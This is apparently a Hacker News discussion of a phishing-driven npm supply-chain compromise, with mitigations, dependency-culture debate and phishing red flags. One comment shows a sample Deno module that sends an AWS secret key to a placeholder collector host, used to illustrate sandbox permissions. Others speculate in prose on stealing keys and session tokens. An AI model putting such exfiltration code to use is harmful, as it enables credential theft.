Posted by WhyNotHugo 3 days ago
This happened even if you had pinned dependencies and were on top of security updates.
We need some deeper changes in the ecosystem.
https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7...
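One partial mitigation, for what it's worth (it wouldn't have saved everyone here, and some packages legitimately need their scripts): npm can be told not to run lifecycle scripts at all, which is how most install-time payloads execute. A minimal .npmrc:

    # .npmrc: never run preinstall/install/postinstall scripts.
    # Tradeoff: packages that build native addons will break and need
    # explicit handling.
    ignore-scripts=true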
I avoid anything to do with NPM, except for the TypeScript compiler, and I'm looking forward to its rewrite in Go so I can remove even that. For exactly this reason.
As a comparison, Go uses minimum version selection, and it takes great pains to never execute anything you download, even during the compilation stage.
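For anyone unfamiliar: minimum version selection means Go resolves each module to the lowest version that satisfies every requirement in the build graph, never the newest thing on the registry. A sketch (the module path is made up):

    module example.com/app

    go 1.22

    // If this module requires v1.4.0 and some dependency requires
    // v1.6.0, Go builds with v1.6.0: the minimum version that
    // satisfies both. A freshly published v1.7.0 is never picked up
    // until someone explicitly asks for it.
    require github.com/some/dep v1.4.0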
NPM packages will often contain different source than what's in the GitHub repo. How does anyone even trust the system?
The obscurity of languages other than JavaScript will only work as a security measure for so long.
None of it will help you when you're executing the binaries you built, regardless of which language they were written in.
Lavamoat would, if you get to the point of running your program with lavamoat-node or built with the lavamoat webpack plugin: https://lavamoat.github.io/guides/getting-started/
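From memory, the flow in that guide is roughly the following (treat the exact flags as approximate and check the docs):

    # Generate a per-dependency policy by observing what each package
    # actually accesses:
    npx lavamoat app.js --autopolicy

    # Then run the app under that policy; a dependency that suddenly
    # tries to reach the network or filesystem outside its recorded
    # capabilities gets blocked:
    npx lavamoat app.js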
Sure it would... isn't that the whole point of Deno? The binary can't exfiltrate anything if you don't let it connect to the net.
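Concretely, with a hypothetical malicious module like this:

    // exfil.ts: what a compromised dependency might try.
    const secret = Deno.env.get("AWS_SECRET_ACCESS_KEY");
    await fetch("https://collector.example.com", {
      method: "POST",
      body: secret ?? "",
    });

Running it with plain `deno run exfil.ts` fails with a permission error; it only works if you explicitly grant `--allow-env` and `--allow-net`. The catch is that many real apps need broad permissions anyway, at which point the sandbox stops helping.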
Whenever you download an open-source program and you don't have to compile it first, you're at risk of running code that is not necessarily what's in the publicly-available source code.
This can even apply to source code itself when distributed through two different channels, as we saw in the xz backdoor attempt. (The release tarball contained different code from the repository.)
I have seen so many takes lamenting how this kind of supply chain attack is such a difficult problem to fix.
No, it really isn't. It's an ecosystem and cultural problem: npm encourages huge dependency trees that make it impractical to review dependency updates, so developers just don't.
The alternative is C++, where every project essentially starts by reinventing the wheel, which comes with its own set of vulnerabilities.
I'm saying this without a clear idea of how to fix this very real problem.
Sure, in 1995.
Most C++ projects nowadays belong to some fairly well-understood domain, and for every broad domain there are usually one or two large 'ecosystem' libraries that come batteries-included: a huge monolithic dependency with well-established governance instead of 1000 small ones.
Examples of such ecosystems are Qt, LLVM, ROOT, TensorFlow, etc. For smaller projects that want something slightly more than a standard library but don't belong to a clear ecosystem like the above, you have Boost, Folly, Abseil, etc.
Most of these started by someone deciding to reinvent the wheel decades ago, but there's no real reason to do that in 2025.
The difficulty comes in trying to change the entire culture.
“Stop doing that!”
“But I wanna!”
Other languages have package managers similar to npm, but with far fewer issues, so this can be fixed without changing the package manager completely.
And before you know it, you have a multitude of distributions to choose from, each with their own issues...
Source available beats open source from a security perspective.
It is an ecosystem and culture that learned nothing from the debacle of left-pad. And it is an affliction that many organizations face, and it is only going to get worse with the advent of AI-assisted coding (and it does not have to be).
There simply aren't enough adults in the room with the ability to tell the children (or VCs and business people) NO. And getting an "AI" to say no is next to impossible unless you're probing it on a "social issue".
I don't know anything about the npm ecosystem; what's the benefit of importing these libraries compared to including the code in the project?
I am a consumer of apps using npm, not a developer, and I simply don’t like the auto updates and seeing a zillion things updated. I use uv and Python a lot, and I get a similar uneasy feeling there also, but (perhaps incorrectly) I feel more in control.
Seriously, this is one of my key survival mechanisms. By the time I became system administrator for a small services company, I had learned to let other people beta test things. We ran Microsoft Office 2000 for 12 years, and saved soooo many upgrade headaches. We had a decade without the need to retrain.
That, and like others have said... never clicking links in emails.
Such a feature can be added.
At $PAST_DAYJOB we adopted Docker "only" around 2016, and importantly, we used it almost identically to how we used to deploy "plain" uWSGI or Apache apps: a bunch of VMs, run some Ansible roles, pull the code (now image), restart, done.
The time to move to k8s is when you have a k8s-sized problem. [Looks at Github: 760 releases, 3866 contributors.] Yeah, not now.
> A zero-day exploit is a cyberattack vector that takes advantage of an unknown or unaddressed security flaw in computer software, hardware or firmware. "Zero day" refers to the fact that the software or device vendor has zero days to fix the flaw because malicious actors can already use it to access vulnerable systems.
If I never install the infected software, I'm not vulnerable, even if no one knows of its existence.
That said, you could argue that because it's a zero day and no one caught it, it can lie dormant for >2 weeks so your "just wait awhile" strategy might not work if no one catches it in that period.
But if you're a hacker, sitting on a goldmine of infected computers... do you really want to wait it out to scoop up more victims before activating it? It might be caught.
No one bothers finding 0-days in software which no one has installed.
A better defense would be to delete or quarantine the compromised versions, fail the build, and escalate to a human for zero-day defense.
Reading the code content of emergency patches should be part of the job. Of course, with better code trust tools (there seem to have been some attempts at that lately, not sure where they’re at), we can delegate that and still do much better than the current state of things.
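Until such tools mature, a rough approximation of "quarantine and escalate" in CI, assuming npm (audit data lags a fresh compromise, so this only catches already-reported versions):

    # Install exactly what the lockfile pins, without running
    # lifecycle scripts:
    npm ci --ignore-scripts

    # Fail the build on any installed version with a published
    # advisory, forcing a human to look before anything ships:
    npm audit --audit-level=high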
They stop working before you can use them.
https://docs.renovatebot.com/configuration-options/#minimumr...
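In renovate.json that looks roughly like this (the three-day window is just an example value):

    {
      "packageRules": [
        {
          "matchManagers": ["npm"],
          "minimumReleaseAge": "3 days"
        }
      ]
    }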
Dependabot has recently added this functionality too - it's called `cooldown`
https://docs.github.com/en/code-security/dependabot/working-...
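As I understand the linked docs, the dependabot.yml equivalent looks something like:

    version: 2
    updates:
      - package-ecosystem: "npm"
        directory: "/"
        schedule:
          interval: "daily"
        # Don't propose a new version until it has been public for
        # 7 days:
        cooldown:
          default-days: 7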
(I'm soon to be working at Mend on Renovate full time, but have been a big fan of Renovate over other tools for years)
Renovate uses signals like your CI to work out whether things break before an automerge occurs - does that mean your CI didn't catch the breakage? Or something I've missed?
(there's also the "merge confidence" that can help here)
(I'm soon to be working at Mend on Renovate full time)
"Hey, is it still broken? No? Great!"
If I compare a typical Rust project with an equivalent JavaScript one, the JavaScript project itself often has magnitudes more direct dependencies (a wide supply chain?). The Rust tool will have three or four; the JavaScript one over ten, sometimes ten alone just to help build the TypeScript in dev. Worsened by the JavaScript dependencies' own deps (and theirs, and theirs, all the way down to is_array or left_pad), easily getting into the hundreds. In Rust, that graph will list maybe ten more, or, with some complex libraries, a total of several tens.
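You can check this on your own projects; both ecosystems will dump the full resolved graph (rough one-liners; the counting conventions differ slightly):

    # JavaScript: every package installed under node_modules
    npm ls --all --parseable | wc -l

    # Rust: every crate in the resolved graph, deduplicated
    cargo tree --prefix none | sort -u | wc -l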
This attitude difference is also clear in the Python community, where the knee-jerk reaction is to add an import rather than think it through, maybe copy-paste a file, and in any case be very conservative. Do we really need colors in the terminal output? We do? Can we not just create a file with some constants that hold the four ANSI escape codes instead, as sketched below?
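The entire "dependency" being replaced is about this big (sketched in TypeScript here, but it's the same four constants in Python or anything else):

    // colors.ts: the four ANSI escape codes we actually use.
    export const RED = "\x1b[31m";
    export const GREEN = "\x1b[32m";
    export const YELLOW = "\x1b[33m";
    export const RESET = "\x1b[0m";

    // Usage: console.log(`${GREEN}ok${RESET}`);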
I'm trying to argue that there's also an important cultural problem with supply chain attacks to be considered.
I object. You can get a full-blown web app rolling with Django alone. Here's its list of external dependencies, including transitive ones: asgiref, sqlparse, tzdata. (I guess you can also count jQuery, if you're using the _builtin_ admin interface.)
The standard library is slowly swallowing the most important libraries & tools in the ecosystem, such as json or venv. What was once a giant yield-hack to get green threads / async, is now a part of the language. The language itself is conservative in what new features it accepts, 20yro Python code still reads like Python.
Sure, I've worked on a Django codebase with 130 transitive dependencies. But it's 7yro and powers an entire business. A "hello world" app in Express has 150, for Vue it's 550.
This has more to do with the popularity of a language than anything else, I think. Though the fact that Python and JS are used as "entry level" languages probably encourages some of these "lazy" libraries cough cough left-pad cough cough.
But in the end, we should all rely on fewer dependencies. It's certainly the philosophy I'm trying to follow with https://mastrojs.github.io – see e.g. https://jsr.io/@mastrojs/mastro/dependencies
I find it insane that someone would get access to a package like this, then just push a shitty crypto stealer.
You're a criminal with a one-in-a-million opportunity. Wouldn't you invest an extra week pushing a more fleshed-out exploit?
You can exfiltrate API keys, add your SSH public key to the server, then exfiltrate the server's IP address so you can snoop around in there manually. If you're on a dev's machine, maybe grab the browser's profiles, the session tokens for common shopping websites? My personal desktop has all my cards saved on Amazon. My work laptop, depending on the period of my life, could have given you access to stuff you wouldn't believe either.
You don't even need to do anything with those; there are forums to sell that stuff.
Surely there's an explanation, or is it that all the good cybercriminals have stable high paying jobs in tech, and this is what's left for us?
Because of the way this was pulled off, it was going to be found out right away. It wasn't a subtle insertion, it was a complete account takeover. The attacker had only hours before discovery, so the logical thing to do is a hit and run. They asked what the most money is that can be extracted in just a few hours in an automated fashion (no time to investigate targets manually one at a time), and crypto is the obvious answer.
Unless the back doors were so good they weren't going to be discovered even though half the world would be dissecting the attack code, there was no point in even trying.
It might get missed, but I sure notice any time account emails come through even if it's not saying "your password was reset."
And very, very happy that we're proxying all access to npm through Artifactory, which allowed us to block the affected versions and verify that they were in fact never pulled by any of our builds.
That could have netted the attacker something much more valuable, but it is pure hit or miss and it requires more skill and patience for a payoff.
Versus blasting out some crypto-stealing code and grabbing as many funds as possible before being found out.
> Lots of people/organisations are going to be complacent and leave you with valid credentials
You'd get non-root credentials on lots of dev machines, and likely some non-root credentials on prod machines, and possibly root access to some poorly configured machines.
Two-factor is still in place; you only have whatever creds that npm install was run with. Plenty of the really high-value prod targets may very well be on machines that don't even have publicly routable IPs.
With a large enough blast radius, this may have worked, but it wouldn't be guaranteed.
Is that so? From the email, it looks like they MITM'd the 2FA setup process, so they will have qix's 2FA secret. They didn't have to immediately take over qix's account and lock him out; they should have had all the time they needed to come up with a more sophisticated payload.
A decade ago my root/123456 ssh password got pwned in 3-4 days. (I was gonna change to certificate!)
Hetzner alerted me saying that I filled my entire 1TB/mo download quota.
Apparently, the attacker (automation?) took over and used it to scrape alibaba, or did something with their cloud on port 443. It took a few hours to eat up every last byte. It felt like this was part of a huge operation. They also left a non-functional crypto miner in there that I simply couldn't remove.
So while they could cryptolock, they just used it for something insidious and left it alone.
Putting it another way: if I'm a random small-time burglar who happens to find himself in Walter White's vault, I'm stuffing as much cash as I can fit into my bag and ignoring the barrel of methylamine.
The damage from this hack could have been far worse if it was stealing real money people rely on to feed their kids.
Sure, if someone takes my grocery money, that’s a real loss, and that’s why I don’t carry large sums of cash. But that isn’t what happened here.
Can you explain what you meant so I can understand? I think you had a point; I just don't think the risk of the kind of attack in TFA is comparable to someone getting their grocery money stolen, because that kind of individual in-person theft can't really occur at the same scale as the attack in TFA, and even if it could, that's kind of on the end user for carrying more cash than they can defend.
Not always. Many banks will claim e.g. they don't have to cover losses from someone who opened a phishing email, never mind that the bank themselves sends out equally suspicious "real" emails on the regular.
Also, even if it's covered, that money comes from somewhere: ultimately out of the pockets of regular folks who were just using their bank accounts, even if the insurance mechanisms mean it's spread out more widely.
Even if you steal other stuff, you're going to need to turn it all into cryptocurrency anyway, and how much is an AWS key really going to bring in.
There are criminals that focus on extracting passwords and password manager databases as well, though they often also end up going after cryptocurrency websites.
There are probably criminals out there biding their time, waiting for the perfect moment to strike, silently infiltrating companies through carefully picked dependencies, but those don't get caught as easily as the ones draining cryptocurrency wallets.
A couple hundred grand is not what these attackers are after.
step 1: live in a place where the cops do not police this type of activity
step 2: $$$$
> one-in-a-million opportunity
OTOH, this modus operandi is completely inconsistent with the way they published the injected code: by taking over a developer's account. This was going to be noticed quickly.
If the payload had been injected in a more subtle way, it might have taken a long time to figure out. Especially with all the Levenshtein logic that might convince a victim they'd somehow screwed up.
In the case of North Korea, it's really crazy because hackers over there can do this legally in their own country, with the support of their government!
And most popular npm developers are broke.
You wouldn't get targeted, not because they can't, but because it's not worth it.
Many state-sponsored attacks are well documented in books that people can read. They don't want to leave much of a record, because records create buzz.
But (1) how do you do that with hundreds or thousands of SSH/API keys and (2) how do you actually make money from it?
So you get a list of SSH or specific API keys and then write a crawler that can hopefully gather more secrets from them, like credit card details (how would that work btw?) and then what, you google "how to sell credentials" and register on some forum to broker a deal like they do in movies?
Sure sounds a hell of a lot more complicated and precarious than swapping out crypto addresses in flight.
The plot of Office Space might offer clues.
Also isn't it crime 101 that greedy criminals are the ones who are more likely to get caught?
What gets me is everyone acknowledges this, yet HN is full of comments ripping on IT teams for the restrictions & EDR put in place on dev laptops.
We on the ops side have known these risks for years, and that knowledge of those risks is what drives organizational security policies and endpoint configuration.
Security is hard, and it is very inconvenient, but it's increasingly necessary.
To wit: I have an open ticket right now from an automated code review tool that flagged a potential vulnerability. I and two other seniors have confirmed that it is a false alarm so I asked for permission to ignore it by clicking the ignore button in a separate security ticket. They asked for more details to be added to the ticket, except I don’t have permissions to view the ticket. I need to submit another ticket to get permission to view the original ticket to confirm that no less than three senior developers have validated this as a false alarm, which is information that is already on another ticket. This non-issue has been going on for months at this point. The ops person who has asked me to provide more info won’t accept a written explanation via Teams, it has to be added to the ticket.
Stakeholders will quickly treat your entire security system like a waste of time and resources when they can plainly see that many parts of it are a waste of time and resources.
The objection isn’t against security. It is against security theater.
It might not be sensible for the organization as a whole, but there’s no way to determine that conclusively, without going over thousands of different possibilities, edge cases, etc.
I have already documented, in writing, in multiple places, that the automated software has raised a false alarm, as well as providing a piece of code demonstrating that the alert was wrong. They are asking me to document it in an additional place that I don't have access to, presumably for perceived security reasons? We already accept that my reasoning around the false alarm is valid, they just have buried a simple resolution beneath completely stupid process. You are going to get false alarms, if it takes months to deal with a single one, the alarm system is going to get ignored, or bypassed. I have a variety of conflicting demands on my attention.
At the same time, when we came under a coordinated DDOS attack from what was likely a political actor, security didn't notice the millions of requests coming from a country that we have never had a single customer in. Our dev team brought it to their attention where they, again, slowed everything down by insisting on taking part in the mitigation, even though they couldn't figure out how to give themselves permission to access basic things like our logging system. We had to devote one of our on calls to walking them through submitting access tickets, a process presumably put in place by a security team.
I know what good security looks like, and I respect it. Many people have to deal with bad security on a regular basis, and they should not be shamed for correctly pointing out that it is terrible.
The ops person obviously can’t do that on your behalf, at least not in any kind of organizational setup I’ve heard of.
So the solution to an illogical, kafkaesque security process is to bypass the process entirely via authority?
You are making my argument for me.
This is exactly why people don’t take security processes seriously, and fight efforts to add more security processes.
Edit: I didn’t comment on all those other points, so it seems irrelevant to the one question I asked.
Ops are the ones who imposed those constraints. You can't impose absurd constraints and then say you are acting reasonable by abiding by your own absurd constraints.
I'm not dumping on the ops person, but the ops and security team's processes. If you as a developer showed up to a new workplace and the process was that for every code change you had to print out a diff and mail a hard copy to the committee for code reviews, you would be totally justified in calling out the process as needlessly elaborate. Anyone could rightly say that your processes are increasing friction while not actually serving the purpose of having code reviewed by peers. You as a developer have a responsibility to point out that the current process serves no one and should be changed. That's what good security and ops people do too.
In the real world case I am talking about, we can easily foresee that the end result is that the exemption will be allowed, and there will be no security impact. In no way does the process at all contribute to that, and every person involved knows it.
My original post was about how people dislike security when it is actually security theater. That is what is going on here. We already know how this issue ends and how that can be accomplished (document the false alarm, and click the ignore button), and have already done the important part of documenting the issue for posterity.
The process could be: you are a highly paid developer who takes security training and has access to highly sensitive systems so we trust your judgment, when you and your peers agree that this isn't an issue, write that down in the correct place, click the ignore button and move on with your work.
All of the faff of contacting different fiefdoms and submitting tickets does nothing to contribute to the core issue or resolution, and certainly doesn't enhance security. If anything, security theater like this leads to worse security since people will try to find shortcuts or ways of just not handling issues.
All their EDR crud runs on Windows, but as a dev I'm allowed to run WSL, and the tools do not reach inside WSL, so if that gets compromised they would be none the wiser.
There is some instrumentation for linux servers and cloud machines, but that too is full of blind spots.
And as a sibling comment says, a lot of the policies are executed without anyone being able to explain their purpose, being able to grant "functionally equivalent security" exceptions or them even making sense in certain contexts. It feels like dealing with mindless automatons, even though humans are involved. For example a thing that happened a while ago: We were using scrypt as KDF, but their scanning flagged it as unknown password encryption and insisted that we should use SHA2 as a modern, secure hashing function. Weeks of long email threads, escalation and several managers suggesting "just change it to satisfy them" followed. That's a clear example of mindless rule-following making a system less secure.
Blocking remote desktop forwarding of security keys also is a fun one.
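For anyone wondering why that demand was backwards: SHA-2 is a fast general-purpose hash, which is precisely what you don't want for passwords, while scrypt is deliberately memory- and CPU-expensive. Node even ships it in the standard library; a minimal sketch:

    import { randomBytes, scryptSync, timingSafeEqual } from "node:crypto";

    // Deriving the key is intentionally costly, which is the whole
    // point: brute-forcing scrypt outputs is expensive in a way that
    // brute-forcing plain SHA-256(password) is not.
    function hashPassword(password: string) {
      const salt = randomBytes(16);
      const key = scryptSync(password, salt, 64);
      return { salt, key };
    }

    function verifyPassword(password: string, salt: Buffer, key: Buffer) {
      const candidate = scryptSync(password, salt, 64);
      return timingSafeEqual(candidate, key); // constant-time compare
    }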
For anything else you need a fiat market, which is hard to deal with remotely.
The attacker had access to the user's npm repository only.
Your ideas are potentially more lucrative over time, but first they create more work and risk for the attacker.
Also, you underestimate how trivial this 'one-in-a-million opportunity' is; it's definitely not one-in-a-million! Almost anybody with basic coding ability and a few thousand dollars could pull off this hack. There are thousands of libraries which are essentially worthless with millions of downloads, where the author who maintains them is basically broke and barely uses their npm account anymore. Anybody could just buy those npm accounts under false pretenses for a couple thousand dollars and then do whatever they want with tens of thousands (or even hundreds of thousands) of compromised servers. The library author is legally within their rights to sell their digital assets, and it's not their business what the acquirer does with them.
Consumer financial fraud is quite big and relatively harmless. Industrial espionage, OTOH, can potentially put you in the crosshairs of powerful and/or rogue elements, and so only the big actors get involved, but in a targeted way, preferring not to leave much if any trace of compromise.
Nobody cares about your trade secrets, or some nation's nuclear program; just take the crypto.
That looks like a phishing attempt from someone using a random EC2 instance or something, but apparently it's legit. I think. Even the "heads-up" email they sent beforehand looked like phishing, so I was waiting for the actual invoice to see if they really started using that address, but even now I'm not opening these attached PDFs.
These companies tell customers to be suspicious of phishing attempts, and then they pull these stunts.
Edit: nvm it seems it's not the case
Yep. At every BigCo I've worked at, nearly all of the emails from Corporate have been indistinguishable from phishing. Sometimes, they're actual spam!
Do the executives and directors responsible for sending these messages care? No. They never do, and get super defensive and self-righteous when you show them exactly how their precious emails tick every "This message is phishing!" box in the mandatory annual phishing-detection-and-resistance training.
A week later some executive pushing the training emailed the entire company saying that it was unacceptable that nobody from engineering had logged into the training site and spun some story about regulatory requirements. After lots of back and forth they still wouldn't accept that it obviously looked like a phishing email.
Eventually when we actually did the training, it literally told us to check the From address of emails. I sometimes wonder if it was some weird kind of performance art.
“We got pwned but the entire company went through a certified phishing awareness program and we have a DPI firewall. Nothing more we could have done, we’re not liable.”
[0] ...so the payments serve the social function of enriching your buddy and improving your status in the whole favor economy thing...
Our infra guy then had to argue with them for quite a while to just email from their own domain, and that no, we weren't going to add their cert to our DNS and let a third party spoof us (or however that works, idk). Absolutely shocking lack of self-awareness.
Title: "Expense report overdue - Please fill now"
Subject:
<empty body>
<Link to document trying its best to look like Google's attachment icon, but which was actually a hyperlink to a site that asked me to log in with my corporate credentials>
---
So like, obviously this is a stupid phishing email, right? Especially as at this time, I had not used my corporate card.
A few weeks later I got the finance team reaching out threatening to cancel my corporate card because I had charges on it with no corresponding expense report filed.
So on checking the charge history for the corporate card, it was the annual tax payment that all cards in my country are charged every year, which finance should have been well aware of. Of course, the expense system then initially rejected my report because I couldn't provide a receipt, as the card provider deducts this charge automatically with no manual action on the card owner's side...
Cool, get big enough, become friends with the right people, and you can squat an entire name on the internet. What, you're the Nepalese Party for Marxists, you've existed for 70 years, and you want to buy npm.np? Nope, tough luck, some random dude pushes shitty JavaScript packages over there. Sorry for the existing npm.org address too, we're going to expropriate the National Association of Pastoral Musicians. Dare I remind you that the whole left-pad situation happened because Kik, the company, stole (with NPM's assistance, because they were big enough and friends with the right people) the kik package?
At least they're paying tens of millions to buy a shitty-ass .google that no one cares about, because more and more browsers are hiding the URL bar. I'm glad ICANN can use it to buy drinks and hookers instead of being useful.
And then never even did anything with it.
I think you and I have drastically different ideas about how dramatic a response is warranted by the scenario of needing to buy a domain with a different three letters or maybe even four or more letters before the TLD.
> Dare I remind you that the whole left-pad situation happened because Kik, the company, stole (with NPM's assistance, because they were big enough and friends with the right people) the kik package?
...and then the package was entirely removed, which could have been prevented by sane removal policies, e.g. simply not allowing new dependents on a removed package while keeping existing ones working. You're also conflating a resource that's ostensibly free and perpetual for people to claim with one that's only rented for fixed periods of time, for money.
I agree that larger players especially should be proactive and register their names under similar-sounding TLDs to mitigate such phishing attacks, but the attacks can't be outright prevented this way.
You can't protect against people clicking links in emails in this way. You might say `npmjs-help.ph` is a phishy domain, but npmjs.help is a phishy domain and people clicked it anyway.
Domain: NPMJS.HELP (85 similar domains)
Registrar: Porkbun, LLC (4.84 million domains)
Query Time: 8 Sep 2025 - 4:14 PM UTC [1 DAY BACK] [REFRESH]
Registered: 5th September 2025 [4 days back]
Expiry: 5th September 2026 [11 months, 25 days left]
I'd be suspicious of anything registered with Porkbun, a discount registrar. Registered 4 days ago means it's fake.

> It sets a deadline a few days in the future. This creates a sense of urgency, and when you combine urgency with being rushed by life, you are much more likely to fall for the phishing link.
Any time I feel like I'm being rushed, I check deeper. It would help if everyone's official communications only came from the most well known domain (or subdomain).
Heuristics like this one should be performed automatically by the email client.
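Even a naive version of that heuristic would have flagged this case; a sketch (ignores public-suffix rules, Unicode lookalikes, and companies that legitimately mail from multiple domains):

    // Flag links whose host isn't the sender's domain or a
    // subdomain of it.
    function suspiciousLinks(fromDomain: string, links: string[]): string[] {
      return links.filter((link) => {
        const host = new URL(link).hostname;
        return host !== fromDomain && !host.endsWith("." + fromDomain);
      });
    }

    // suspiciousLinks("npmjs.com", ["https://npmjs.help/verify"])
    //   => ["https://npmjs.help/verify"]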
Added: story dedicated to this topic more or less https://news.ycombinator.com/item?id=45179889
I would be very worried about my 2FA provider if they asked me to do this.
And so I would not rate this phishing email a 10/10 at all.
To this day, I don't follow links in other kinds of emails. I mouse over the link to view the domain as a first step in determining how seriously to take the email. If the domain appears to match the known-good one, I copy the link and examine the characters to see if any Unicode lookalikes have been employed.
If the domain seems legitimate, or if I don't recognize it but the email is so convincing that I suspect the company truly is using a different domain (my bank has done this, frustratingly), I still don't click the link. I log in to my account on the known-good domain -- by typing it by hand into the browser's address bar -- and look for notifications.
If there are no notifications, then I might contact the company about the email to verify its authenticity.
If anyone reading thinks that seems like a lot of work, I agree with you! It stinks. But I humbly submit that it's necessary on today's Internet. And it's especially necessary if you're in charge of globally used software libraries.
To adopt the tone of the article's author, if they aren't willing to do that, they're wrong, and they're going to keep getting phished.
I think the vast, vast majority of people would have fallen for it. It's a decent-looking message, it has a sense of urgency, and the domain doesn't look wildly wrong. Devs in theory might be more security-aware, but we also work with a lot of different apps, systems, and sites: mixed domains, weird deep links, redirects. We've all used (and possibly even deployed) such setups.
Add in that most of my email is now through a corporate Outlook, so domains aren't very visible; it's all nestled behind "safelinks". And personal email is often on a phone, where mousing over a link just isn't muscle memory anymore.
I think I'd be suspicious at the request, but I might possibly have clicked to see more, especially with the threat that things might stop working soon. Maybe NPM/package platforms should be pushing security training to their biggest maintainers like your old corporation did, but for now they don't, and the idea that people should be more aware of the risk is sort of the point.
Almost anyone would have fallen for that; that's why almost all of us need to be reminded to think about this stuff more.
When a lone developer is untrained and doesn't follow best practices, as happened here, the community rushes to their defense on the grounds of empathy: "We would ALL make this mistake." But what if we wouldn't? What if we're trained and have certain safety protocols and procedures that we hold ourselves to?
This is why, at the end of the day, I run my company on a more centralized ecosystem, for all its warts. At least there's the promise of standard practices and procedures and training, whether it's always perfectly fulfilled or not. With a community-driven ecosystem, you don't have that: You're relying on the standards of the community, a vague and nebulous group that doesn't necessarily have any security sense, as you rightly pointed out. I realize not everyone has the luxury of making that choice due to career/financial constraints.
I think that's overstated. This phishing attempt had some obvious red flags that many people here would have noticed, sure. So not everyone is going to fall for this phish.
But the principle is better expressed as "Everyone will fall for a phish", somewhere. Even you. Human engineering is human engineering and we're all fallible. All that's required is that someone figure out which mistakes you're likely to make.
I like to think I wouldn't. I don't put credentials into links from emails that I didn't trigger right then (e.g. password reset emails). That's a security skill everyone should be practicing in 2025.
1. Like you, I never put credentials into links from emails that I didn’t trigger/wasn’t expecting. This is a generally-sensible practise.
2. Updating 2FA credentials is nonsense. I don’t expect everyone to know this, this is the weakest of the three.
3. If my credentials don't autofill due to origin mismatch, I am not filling them in manually. Ever. I would instead, if I thought it genuine, go to their actual site and log in there, and then see nothing about what the phish claimed. I've heard people talking about companies using multiple origins for their login forms and how having to deal with that undermines this aspect, but for myself I don't believe I've ever seen that, not even once. It's definitely not common, and origin-locked second factors should make that practice disappear altogether.
Now these three are not of equal strength. The second requires specific knowledge, and a phish could conceivably use something similar that isn’t such nonsense anyway. The first is a best practice that seems to require some discipline, so although everyone should do it, it is unfortunately not the strongest. But the third? When you’re using a password manager with autofill, that one should be absolutely robust. It protects you! You have to go out of your way to get phished!
The problem with this is that companies often send out legit emails saying things like "update your 2FA recovery methods". Most people don't know well enough how 2FA works to spot the difference.
It would be just as easy to argue that anyone is negligent who uses software without confirming that the vendor's security certifications include whatever process you imagine avoids the 'human makes one mistake and continues with their normal workflow' error, or that holds updates until they're evaluated.
The point of not assigning blame isn't to absolve people of the need to have their guard up but to recognise that everyone is capable of mistakes.
I've had emails like that from various places, probably legitimate, but I absolutely never click the bloody link from an email and enter my credentials into it! That's internet safety 101.
Same issue with Python, Rust, etc. It's all very trust-driven.
In the Java world, I know there’s been griping from mostly juniors re “why isn’t Maven easy like npm?” (I work with some of these people). I point them to this article: https://www.sonatype.com/blog/why-namespacing-matters-in-pub...
Maven got a lot of things right back in the day. Yes POM files are in xml and we all know xml sucks etc, but aside from that the stodgy focus on robustness and carefully considered change gets more impressive all the time.
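The namespacing point, concretely: every Maven artifact lives under a groupId, and publishing to Maven Central requires proving control of that namespace (typically the DNS domain) up front, whereas npm's default namespace is flat and first-come, first-served (scopes exist, but they're optional):

    <!-- Whoever publishes under com.fasterxml.jackson.core had to
         verify ownership of that namespace with Sonatype first. -->
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.17.0</version>
    </dependency>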
The only solution would be to prevent all releases from being applied immediately.
No hardware keys, no new releases.
They have it implemented.
I created an NPM account today and added a passkey from my laptop, plus a hardware key as secondary. As I have it configured, it asked me for the key while publishing my test package.
So the guy either had TOTP or just the password.
Seems like enforcement should be easy to implement.
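Some of the knobs already exist, at least per-account and per-package (commands as I remember them from npm 9+; verify against the CLI docs):

    # Require 2FA for both login and publishing on your own account:
    npm profile enable-2fa auth-and-writes

    # Require 2FA from anyone publishing a given package:
    npm access set mfa=publish <package-name>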